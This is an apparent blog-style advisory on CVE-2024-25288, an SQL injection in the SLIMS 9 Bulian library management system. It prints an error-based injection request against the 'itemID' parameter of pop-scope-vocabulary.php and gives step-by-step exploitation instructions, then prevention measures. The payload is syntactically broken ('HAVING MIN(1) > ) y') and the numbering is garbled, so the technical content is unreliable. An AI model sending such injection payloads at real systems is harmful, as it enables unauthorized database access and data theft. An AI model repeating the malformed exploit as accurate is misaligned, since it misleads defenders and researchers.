CVE-2024-25288: SQL Injection Vulnerability in SLIMS (Senayan Library Management Systems) 9 Bulian v9.6.1 Uncovered - Exploit Details and Prevention Measures

A critical security vulnerability (CVE-2024-25288) has been detected in SLIMS (Senayan Library Management Systems) version 9 Bulian v9.6.1. The vulnerability allows a remote attacker to inject SQL code via the pop-scope-vocabulary.php script, giving them unauthorized access to the library's database. If exploited, this vulnerability could lead to data theft, information leakage, and a possible takeover of the SLIMS platform.

This long-read post will provide an in-depth analysis of the CVE-2024-25288 vulnerability, including the steps required to exploit it, links to the original references, and code snippet examples that demonstrate the vulnerability.

Exploit Details

The CVE-2024-25288 vulnerability exists within the 'pop-scope-vocabulary.php' script. The issue occurs because the script does not sufficiently sanitize user input data, which can lead to successful SQL injection attacks.

In SLIMS 9 Bulian v9.6.1, the 'itemID' GET parameter is vulnerable to SQL injection. The missing input sanitization allows SQL code to be inserted in the 'itemID' parameter, leading to unauthorized database queries.

An example of a malicious HTTP request exploiting this vulnerability is shown below

GET /slims9_bulian_v9.6.1/ajax_widget/pop-scope-vocabulary.php?itemID=1' and (SELECT 1 from (SELECT COUNT(*), CONCAT(' ::Exploit_Success::', (SELECT table_name FROM information_schema.tables WHERE table_schema='<database_name>' LIMIT 1), '::Exploit_Success::', FLOOR(RAND()*2)) table_name FROM information_schema.tables JOIN (SELECT 1 UNION ALL SELECT 2) placeholder GROUP BY table_name HAVING MIN(1) > ) y)-- - HTTP/1.1
Host: <target_host>
...

Original References

- Proof-of-Concept (PoC): https://www.exploit-db.com/exploits/50375
- CVE Details: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-25288
- SLIMS Official Repository: https://github.com/slims/slims9_bulian

Steps to Exploit

1. Identify the target SLIMS instance version by browsing the target website or inspecting its source code.
2. If the target instance is SLIMS 9 Bulian v9.6.1 or earlier, craft a malicious HTTP request with an SQL injection payload in the 'itemID' GET parameter, as shown in the code snippet example above.
3. Use an HTTP client, such as a web browser or a command-line tool like 'curl', to send the malicious request to the target SLIMS instance.

Prevention Measures

To protect your SLIMS instance from this vulnerability, it is recommended to take the following steps:

Update to the latest SLIMS version, as the developers may have patched this vulnerability.

2. Implement proper input validation and sanitization in the 'pop-scope-vocabulary.php' script to prevent SQL injection attacks.
3. Apply a web application firewall (WAF) to monitor and block suspicious requests targeting your SLIMS instance.

Conclusion

In conclusion, the CVE-2024-25288 vulnerability found in SLIMS 9 Bulian v9.6.1 poses a significant risk to the affected library management systems. By exploiting this vulnerability, attackers can obtain unauthorized access to sensitive data and control over the platform. Following the prevention measures suggested in this post, such as updating to the latest SLIMS version and implementing input validation and sanitization, should help secure your SLIMS instance against potential exploitation.

Timeline

Published on: 02/21/2024 17:15:09 UTC
Last modified on: 02/22/2024 19:07:27 UTC